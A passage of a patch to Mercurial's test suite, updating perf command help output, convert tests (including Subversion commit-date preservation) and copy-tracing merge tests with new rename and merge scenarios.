- perfrevlogindex
+ perf::revlogindex
Benchmark operations against a revlog index.
- perfrevlogrevision
+ perf::revlogrevision
Benchmark obtaining a revlog revision.
- perfrevlogrevisions
+ perf::revlogrevisions
Benchmark reading a series of revisions from a revlog.
- perfrevlogwrite
+ perf::revlogwrite
Benchmark writing a series of revisions to a revlog.
- perfrevrange (no help text available)
- perfrevset benchmark the execution time of a revset
- perfstartup (no help text available)
- perfstatus benchmark the performance of a single status call
- perftags (no help text available)
- perftemplating
+ perf::revrange
+ (no help text available)
+ perf::revset benchmark the execution time of a revset
+ perf::startup
+ (no help text available)
+ perf::status benchmark the performance of a single status call
+ perf::tags (no help text available)
+ perf::templating
test the rendering time of a given template
- perfunidiff benchmark a unified diff between revisions
- perfvolatilesets
+ perf::unidiff
+ benchmark a unified diff between revisions
+ perf::volatilesets
benchmark the computation of various volatile set
- perfwalk (no help text available)
- perfwrite microbenchmark ui.write (and others)
+ perf::walk (no help text available)
+ perf::write microbenchmark ui.write (and others)
(use 'hg help -v perf' to show built-in aliases and global options)
+
+ $ hg help perfaddremove
+ hg perf::addremove
+
+ aliases: perfaddremove
+
+ (no help text available)
+
+ options:
+
+ -T --template TEMPLATE display with template
+
+ (some details hidden, use --verbose to show complete help)
+
$ hg perfaddremove
$ hg perfancestors
$ hg perfancestorset 2
--- a/tests/test-convert-cvs.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-convert-cvs.t Tue Apr 20 11:01:06 2021 -0400
@@ -521,7 +521,7 @@
|cp932 |\x82\xa0 | x x o |
$ mkdir -p cvsrepo/transcoding
- $ python <<EOF
+ $ "$PYTHON" <<EOF
> fp = open('cvsrepo/transcoding/file,v', 'wb')
> fp.write((b'''
> head 1.4;
--- a/tests/test-convert-filemap.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-convert-filemap.t Tue Apr 20 11:01:06 2021 -0400
@@ -292,12 +292,12 @@
$ rm -rf source/.hg/store/data/dir/file4
#endif
$ hg -q convert --filemap renames.fmap --datesort source dummydest
- abort: data/dir/file3.i@e96dce0bc6a2: no match found (reporevlogstore !)
+ abort: data/dir/file3.i@e96dce0bc6a217656a3a410e5e6bec2c4f42bf7c: no match found (reporevlogstore !)
abort: data/dir/file3/index@e96dce0bc6a2: no node (reposimplestore !)
[50]
$ hg -q convert --filemap renames.fmap --datesort --config convert.hg.ignoreerrors=1 source renames.repo
- ignoring: data/dir/file3.i@e96dce0bc6a2: no match found (reporevlogstore !)
- ignoring: data/dir/file4.i@6edd55f559cd: no match found (reporevlogstore !)
+ ignoring: data/dir/file3.i@e96dce0bc6a217656a3a410e5e6bec2c4f42bf7c: no match found (reporevlogstore !)
+ ignoring: data/dir/file4.i@6edd55f559cdce67132b12ca09e09cee08b60442: no match found (reporevlogstore !)
ignoring: data/dir/file3/index@e96dce0bc6a2: no node (reposimplestore !)
ignoring: data/dir/file4/index@6edd55f559cd: no node (reposimplestore !)
$ hg up -q -R renames.repo
--- a/tests/test-convert-hg-source.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-convert-hg-source.t Tue Apr 20 11:01:06 2021 -0400
@@ -182,7 +182,7 @@
sorting...
converting...
4 init
- ignoring: data/b.i@1e88685f5dde: no match found (reporevlogstore !)
+ ignoring: data/b.i@1e88685f5ddec574a34c70af492f95b6debc8741: no match found (reporevlogstore !)
ignoring: data/b/index@1e88685f5dde: no node (reposimplestore !)
3 changeall
2 changebagain
--- a/tests/test-convert-svn-sink.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-convert-svn-sink.t Tue Apr 20 11:01:06 2021 -0400
@@ -54,10 +54,12 @@
2 2 test a
revision: 2
author: test
+ date: * (glob)
msg: modify a file
M /a
revision: 1
author: test
+ date: * (glob)
msg: add a file
A /a
A /d1
@@ -95,6 +97,7 @@
3 3 test b
revision: 3
author: test
+ date: * (glob)
msg: rename a file
D /a
A /b (from /a@2)
@@ -131,6 +134,7 @@
4 4 test c
revision: 4
author: test
+ date: * (glob)
msg: copy a file
A /c (from /b@3)
$ ls a a-hg-wc
@@ -167,6 +171,7 @@
5 5 test .
revision: 5
author: test
+ date: * (glob)
msg: remove a file
D /b
$ ls a a-hg-wc
@@ -209,6 +214,7 @@
6 6 test c
revision: 6
author: test
+ date: * (glob)
msg: make a file executable
M /c
#if execbit
@@ -247,6 +253,7 @@
8 8 test newlink
revision: 8
author: test
+ date: * (glob)
msg: move symlink
D /link
A /newlink (from /link@7)
@@ -278,6 +285,7 @@
7 7 test f
revision: 7
author: test
+ date: * (glob)
msg: f
D /c
A /d
@@ -315,6 +323,7 @@
1 1 test d1/a
revision: 1
author: test
+ date: * (glob)
msg: add executable file in new directory
A /d1
A /d1/a
@@ -343,6 +352,7 @@
2 2 test d2/a
revision: 2
author: test
+ date: * (glob)
msg: copy file to new directory
A /d2
A /d2/a (from /d1/a@1)
@@ -416,21 +426,25 @@
4 4 test right-2
revision: 4
author: test
+ date: * (glob)
msg: merge
A /right-1
A /right-2
revision: 3
author: test
+ date: * (glob)
msg: left-2
M /b
A /left-2
revision: 2
author: test
+ date: * (glob)
msg: left-1
M /b
A /left-1
revision: 1
author: test
+ date: * (glob)
msg: base
A /b
@@ -459,10 +473,12 @@
2 2 test .hgtags
revision: 2
author: test
+ date: * (glob)
msg: Tagged as v1.0
A /.hgtags
revision: 1
author: test
+ date: * (glob)
msg: Add file a
A /a
$ rm -rf a a-hg a-hg-wc
@@ -494,10 +510,12 @@
2 2 test exec
revision: 2
author: test
+ date: * (glob)
msg: remove executable bit
M /exec
revision: 1
author: test
+ date: * (glob)
msg: create executable
A /exec
$ test ! -x a-hg-wc/exec
@@ -540,11 +558,77 @@
2 2 test b
revision: 2
author: test
+ date: * (glob)
msg: Another change
A /b
revision: 1
author: test
+ date: * (glob)
msg: Some change
A /a
$ rm -rf a a-hg a-hg-wc
+
+Commit dates convertion
+
+ $ hg init a
+
+ $ echo a >> a/a
+ $ hg add a
+ adding a/a
+ $ hg --cwd a ci -d '1 0' -A -m 'Change 1'
+
+ $ echo a >> a/a
+ $ hg --cwd a ci -d '2 0' -m 'Change 2'
+
+ $ echo a >> a/a
+ $ hg --cwd a ci -d '2 0' -m 'Change at the same time'
+
+ $ echo a >> a/a
+ $ hg --cwd a ci -d '1 0' -m 'Change in the past'
+
+ $ echo a >> a/a
+ $ hg --cwd a ci -d '3 0' -m 'Change in the future'
+
+ $ hg convert --config convert.svn.dangerous-set-commit-dates=true -d svn a
+ assuming destination a-hg
+ initializing svn repository 'a-hg'
+ initializing svn working copy 'a-hg-wc'
+ scanning source...
+ sorting...
+ converting...
+ 4 Change 1
+ 3 Change 2
+ 2 Change at the same time
+ 1 Change in the past
+ 0 Change in the future
+ $ svnupanddisplay a-hg-wc 0
+ 5 5 test .
+ 5 5 test a
+ revision: 5
+ author: test
+ date: 1970-01-01T00:00:03.000000Z
+ msg: Change in the future
+ M /a
+ revision: 4
+ author: test
+ date: 1970-01-01T00:00:01.000000Z
+ msg: Change in the past
+ M /a
+ revision: 3
+ author: test
+ date: 1970-01-01T00:00:02.000000Z
+ msg: Change at the same time
+ M /a
+ revision: 2
+ author: test
+ date: 1970-01-01T00:00:02.000000Z
+ msg: Change 2
+ M /a
+ revision: 1
+ author: test
+ date: 1970-01-01T00:00:01.000000Z
+ msg: Change 1
+ A /a
+
+ $ rm -rf a a-hg a-hg-wc
--- a/tests/test-convert.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-convert.t Tue Apr 20 11:01:06 2021 -0400
@@ -388,6 +388,23 @@
does not convert tags from the source repo to the target
repo. The default is False.
+ Subversion Destination
+ ######################
+
+ Original commit dates are not preserved by default.
+
+ convert.svn.dangerous-set-commit-dates
+ preserve original commit dates, forcefully setting
+ "svn:date" revision properties. This option is DANGEROUS and
+ may break some subversion functionality for the resulting
+ repository (e.g. filtering revisions with date ranges in
+ "svn log"), as original commit dates are not guaranteed to
+ be monotonically increasing.
+
+ For commit dates setting to work destination repository must have "pre-
+ revprop-change" hook configured to allow setting of "svn:date" revision
+ properties. See Subversion documentation for more details.
+
options ([+] can be repeated):
-s --source-type TYPE source repository type
--- a/tests/test-copies-chain-merge.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-copies-chain-merge.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,4 +1,4 @@
-#testcases filelog compatibility changeset sidedata upgraded
+#testcases filelog compatibility changeset sidedata upgraded upgraded-parallel
=====================================================
Test Copy tracing for chain of copies involving merge
@@ -14,11 +14,24 @@
use git diff to see rename
+ $ cat << EOF >> ./no-linkrev
+ > #!$PYTHON
+ > # filter out linkrev part of the debugindex command
+ > import sys
+ > for line in sys.stdin:
+ > if " linkrev " in line:
+ > print(line.rstrip())
+ > else:
+ > l = "%s *%s" % (line[:6], line[14:].rstrip())
+ > print(l)
+ > EOF
+ $ chmod +x no-linkrev
+
$ cat << EOF >> $HGRCPATH
> [diff]
> git=yes
> [command-templates]
- > log={rev} {desc}\n
+ > log={desc}\n
> EOF
#if compatibility
@@ -45,28 +58,45 @@
#endif
+ $ cat > same-content.txt << EOF
+ > Here is some content that will be the same accros multiple file.
+ >
+ > This is done on purpose so that we end up in some merge situation, were the
+ > resulting content is the same as in the parent(s), but a new filenodes still
+ > need to be created to record some file history information (especially
+ > about copies).
+ > EOF
+
$ hg init repo-chain
$ cd repo-chain
Add some linear rename initialy
- $ echo a > a
- $ echo b > b
- $ echo h > h
- $ hg ci -Am 'i-0 initial commit: a b h'
+ $ cp ../same-content.txt a
+ $ cp ../same-content.txt b
+ $ cp ../same-content.txt h
+ $ echo "original content for P" > p
+ $ echo "original content for Q" > q
+ $ echo "original content for R" > r
+ $ hg ci -Am 'i-0 initial commit: a b h p q r'
adding a
adding b
adding h
+ adding p
+ adding q
+ adding r
$ hg mv a c
- $ hg ci -Am 'i-1: a -move-> c'
+ $ hg mv p s
+ $ hg ci -Am 'i-1: a -move-> c, p -move-> s'
$ hg mv c d
- $ hg ci -Am 'i-2: c -move-> d'
+ $ hg mv s t
+ $ hg ci -Am 'i-2: c -move-> d, s -move-> t'
$ hg log -G
- @ 2 i-2: c -move-> d
+ @ i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
And having another branch with renames on the other side
@@ -76,15 +106,15 @@
$ hg mv e f
$ hg ci -Am 'a-2: e -move-> f'
$ hg log -G --rev '::.'
- @ 4 a-2: e -move-> f
+ @ a-2: e -move-> f
|
- o 3 a-1: d -move-> e
+ o a-1: d -move-> e
|
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Have a branching with nothing on one side
@@ -95,13 +125,13 @@
$ hg ci -m 'b-1: b update'
created new head
$ hg log -G --rev '::.'
- @ 5 b-1: b update
+ @ b-1: b update
|
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Create a branch that delete a file previous renamed
@@ -112,13 +142,13 @@
$ hg ci -m 'c-1 delete d'
created new head
$ hg log -G --rev '::.'
- @ 6 c-1 delete d
+ @ c-1 delete d
|
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Create a branch that delete a file previous renamed and recreate it
@@ -132,15 +162,15 @@
$ hg add d
$ hg ci -m 'd-2 re-add d'
$ hg log -G --rev '::.'
- @ 8 d-2 re-add d
+ @ d-2 re-add d
|
- o 7 d-1 delete d
+ o d-1 delete d
|
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Having another branch renaming a different file to the same filename as another
@@ -153,16 +183,61 @@
$ hg mv g f
$ hg ci -m 'e-2 g -move-> f'
$ hg log -G --rev '::.'
- @ 10 e-2 g -move-> f
+ @ e-2 g -move-> f
+ |
+ o e-1 b -move-> g
+ |
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
|
- o 9 e-1 b -move-> g
+ o i-0 initial commit: a b h p q r
+
+ $ hg up -q null
+
+Having a branch similar to the 'a' one, but moving the 'p' file around.
+
+ $ hg up 'desc("i-2")'
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg mv t u
+ $ hg ci -Am 'p-1: t -move-> u'
+ created new head
+ $ hg mv u v
+ $ hg ci -Am 'p-2: u -move-> v'
+ $ hg log -G --rev '::.'
+ @ p-2: u -move-> v
+ |
+ o p-1: t -move-> u
+ |
+ o i-2: c -move-> d, s -move-> t
|
- o 2 i-2: c -move-> d
+ o i-1: a -move-> c, p -move-> s
|
- o 1 i-1: a -move-> c
+ o i-0 initial commit: a b h p q r
+
+ $ hg up -q null
+
+Having another branch renaming a different file to the same filename as another
+
+ $ hg up 'desc("i-2")'
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg mv r w
+ $ hg ci -m 'q-1 r -move-> w'
+ created new head
+ $ hg mv w v
+ $ hg ci -m 'q-2 w -move-> v'
+ $ hg log -G --rev '::.'
+ @ q-2 w -move-> v
|
- o 0 i-0 initial commit: a b h
+ o q-1 r -move-> w
+ |
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+ $ hg up -q null
Setup all merge
===============
@@ -176,35 +251,37 @@
- rename on one side
- unrelated change on the other side
+ $ case_desc="simple merge - A side: multiple renames, B side: unrelated update"
+
$ hg up 'desc("b-1")'
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("a-2")'
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mBAm-0 simple merge - one way'
+ $ hg ci -m "mBAm-0 $case_desc - one way"
$ hg up 'desc("a-2")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mABm-0 simple merge - the other way'
+ $ hg ci -m "mABm-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mABm")+desc("mBAm"))'
- @ 12 mABm-0 simple merge - the other way
+ @ mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way
|\
- +---o 11 mBAm-0 simple merge - one way
+ +---o mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way
| |/
- | o 5 b-1: b update
+ | o b-1: b update
| |
- o | 4 a-2: e -move-> f
+ o | a-2: e -move-> f
| |
- o | 3 a-1: d -move-> e
+ o | a-1: d -move-> e
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
@@ -216,12 +293,14 @@
- one deleting the change
and recreate an unrelated file after the merge
+ $ case_desc="simple merge - C side: delete a file with copies history , B side: unrelated update"
+
$ hg up 'desc("b-1")'
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg merge 'desc("c-1")'
0 files updated, 0 files merged, 1 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mBCm-0 simple merge - one way'
+ $ hg ci -m "mBCm-0 $case_desc - one way"
$ echo bar > d
$ hg add d
$ hg ci -m 'mBCm-1 re-add d'
@@ -230,29 +309,29 @@
$ hg merge 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mCBm-0 simple merge - the other way'
+ $ hg ci -m "mCBm-0 $case_desc - the other way"
created new head
$ echo bar > d
$ hg add d
$ hg ci -m 'mCBm-1 re-add d'
$ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))'
- @ 16 mCBm-1 re-add d
+ @ mCBm-1 re-add d
|
- o 15 mCBm-0 simple merge - the other way
+ o mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way
|\
- | | o 14 mBCm-1 re-add d
+ | | o mBCm-1 re-add d
| | |
- +---o 13 mBCm-0 simple merge - one way
+ +---o mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way
| |/
- | o 6 c-1 delete d
+ | o c-1 delete d
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Comparing with a merge re-adding the file afterward
@@ -262,84 +341,139 @@
- one with change to an unrelated file
- one deleting and recreating the change
+ $ case_desc="simple merge - B side: unrelated update, D side: delete and recreate a file (with different content)"
+
$ hg up 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("d-2")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mBDm-0 simple merge - one way'
+ $ hg ci -m "mBDm-0 $case_desc - one way"
$ hg up 'desc("d-2")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mDBm-0 simple merge - the other way'
+ $ hg ci -m "mDBm-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))'
- @ 18 mDBm-0 simple merge - the other way
+ @ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way
|\
- +---o 17 mBDm-0 simple merge - one way
+ +---o mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way
| |/
- | o 8 d-2 re-add d
+ | o d-2 re-add d
| |
- | o 7 d-1 delete d
+ | o d-1 delete d
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Comparing with a merge with colliding rename
--------------------------------------------
+Subcase: new copy information on both side
+``````````````````````````````````````````
+
- the "e-" branch renaming b to f (through 'g')
- the "a-" branch renaming d to f (through e)
+ $ case_desc="merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f)"
+
$ hg up 'desc("a-2")'
2 files updated, 0 files merged, 1 files removed, 0 files unresolved
- $ hg merge 'desc("e-2")' --tool :union
- merging f
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("e-2")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
(branch merge, don't forget to commit)
- $ hg ci -m 'mAEm-0 simple merge - one way'
+ $ hg ci -m "mAEm-0 $case_desc - one way"
$ hg up 'desc("e-2")'
- 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
- $ hg merge 'desc("a-2")' --tool :union
- merging f
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
+ $ hg merge 'desc("a-2")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
(branch merge, don't forget to commit)
- $ hg ci -m 'mEAm-0 simple merge - the other way'
+ $ hg ci -m "mEAm-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))'
- @ 20 mEAm-0 simple merge - the other way
+ @ mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way
|\
- +---o 19 mAEm-0 simple merge - one way
+ +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way
| |/
- | o 10 e-2 g -move-> f
+ | o e-2 g -move-> f
| |
- | o 9 e-1 b -move-> g
+ | o e-1 b -move-> g
| |
- o | 4 a-2: e -move-> f
+ o | a-2: e -move-> f
| |
- o | 3 a-1: d -move-> e
+ o | a-1: d -move-> e
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
|
- o 1 i-1: a -move-> c
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: new copy information on both side with an actual merge happening
+`````````````````````````````````````````````````````````````````````````
+
+- the "p-" branch renaming 't' to 'v' (through 'u')
+- the "q-" branch renaming 'r' to 'v' (through 'w')
+
+ $ case_desc="merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content)"
+
+ $ hg up 'desc("p-2")'
+ 3 files updated, 0 files merged, 2 files removed, 0 files unresolved
+ $ hg merge 'desc("q-2")' --tool ':union'
+ merging v
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mPQm-0 $case_desc - one way"
+ $ hg up 'desc("q-2")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("p-2")' --tool ':union'
+ merging v
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mQPm-0 $case_desc - the other way"
+ created new head
+ $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))'
+ o mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way
+ |\
+ +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way
+ | |/
+ | o e-2 g -move-> f
+ | |
+ | o e-1 b -move-> g
+ | |
+ o | a-2: e -move-> f
+ | |
+ o | a-1: d -move-> e
+ |/
+ o i-2: c -move-> d, s -move-> t
|
- o 0 i-0 initial commit: a b h
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+Subcase: existing copy information overwritten on one branch
+````````````````````````````````````````````````````````````
Merge:
- one with change to an unrelated file (b)
- one overwriting a file (d) with a rename (from h to i to d)
+ $ case_desc="simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d)"
+
$ hg up 'desc("i-2")'
2 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg mv h i
@@ -347,45 +481,104 @@
created new head
$ hg mv --force i d
$ hg commit -m "f-2: rename i -> d"
- $ hg debugindex d
+ $ hg debugindex d | ../no-linkrev
rev linkrev nodeid p1 p2
- 0 2 169be882533b 000000000000 000000000000 (no-changeset !)
- 0 2 b789fdd96dc2 000000000000 000000000000 (changeset !)
- 1 8 b004912a8510 000000000000 000000000000
- 2 22 4a067cf8965d 000000000000 000000000000 (no-changeset !)
- 2 22 fe6f8b4f507f 000000000000 000000000000 (changeset !)
+ 0 * d8252ab2e760 000000000000 000000000000 (no-changeset !)
+ 0 * ae258f702dfe 000000000000 000000000000 (changeset !)
+ 1 * b004912a8510 000000000000 000000000000
+ 2 * 7b79e2fe0c89 000000000000 000000000000 (no-changeset !)
$ hg up 'desc("b-1")'
- 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
$ hg merge 'desc("f-2")'
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
(branch merge, don't forget to commit)
- $ hg ci -m 'mBFm-0 simple merge - one way'
+ $ hg ci -m "mBFm-0 $case_desc - one way"
$ hg up 'desc("f-2")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mFBm-0 simple merge - the other way'
+ $ hg ci -m "mFBm-0 $case_desc - the other way"
created new head
+ $ hg up null --quiet
$ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))'
- @ 24 mFBm-0 simple merge - the other way
+ o mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
|\
- +---o 23 mBFm-0 simple merge - one way
+ +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
| |/
- | o 22 f-2: rename i -> d
+ | o f-2: rename i -> d
+ | |
+ | o f-1: rename h -> i
| |
- | o 21 f-1: rename h -> i
- | |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
|
- o 1 i-1: a -move-> c
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: existing copy information overwritten on one branch, with different content)
+`````````````````````````````````````````````````````````````````````````````````````
+
+Merge:
+- one with change to an unrelated file (b)
+- one overwriting a file (t) with a rename (from r to x to t), v content is not the same as on the other branch
+
+ $ case_desc="simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content"
+
+ $ hg up 'desc("i-2")'
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg mv r x
+ $ hg commit -m "r-1: rename r -> x"
+ created new head
+ $ hg mv --force x t
+ $ hg commit -m "r-2: rename t -> x"
+ $ hg debugindex t | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * d74efbf65309 000000000000 000000000000 (no-changeset !)
+ 1 * 02a930b9d7ad 000000000000 000000000000 (no-changeset !)
+ 0 * 5aed6a8dbff0 000000000000 000000000000 (changeset !)
+ 1 * a38b2fa17021 000000000000 000000000000 (changeset !)
+ $ hg up 'desc("b-1")'
+ 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("r-2")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mBRm-0 $case_desc - one way"
+ $ hg up 'desc("r-2")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("b-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mRBm-0 $case_desc - the other way"
+ created new head
+ $ hg up null --quiet
+ $ hg log -G --rev '::(desc("mBRm")+desc("mRBm"))'
+ o mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way
+ |\
+ +---o mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way
+ | |/
+ | o r-2: rename t -> x
+ | |
+ | o r-1: rename r -> x
+ | |
+ o | b-1: b update
+ |/
+ o i-2: c -move-> d, s -move-> t
|
- o 0 i-0 initial commit: a b h
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+Subcase: reset of the copy history on one side
+``````````````````````````````````````````````
+
Merge:
- one with change to a file
- one deleting and recreating the file
@@ -393,8 +586,10 @@
Unlike in the 'BD/DB' cases, an actual merge happened here. So we should
consider history and rename on both branch of the merge.
+ $ case_desc="actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content"
+
$ hg up 'desc("i-2")'
- 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ echo "some update" >> d
$ hg commit -m "g-1: update d"
created new head
@@ -404,33 +599,35 @@
merging d
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mDGm-0 simple merge - one way'
+ $ hg ci -m "mDGm-0 $case_desc - one way"
$ hg up 'desc("g-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("d-2")' --tool :union
merging d
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mGDm-0 simple merge - the other way'
+ $ hg ci -m "mGDm-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))'
- @ 27 mGDm-0 simple merge - the other way
+ @ mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way
|\
- +---o 26 mDGm-0 simple merge - one way
+ +---o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
| |/
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 8 d-2 re-add d
+ o | d-2 re-add d
| |
- o | 7 d-1 delete d
+ o | d-1 delete d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
|
- o 1 i-1: a -move-> c
- |
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
+Subcase: merging a change to a file with a "copy overwrite" to that file from another branch
+````````````````````````````````````````````````````````````````````````````````````````````
Merge:
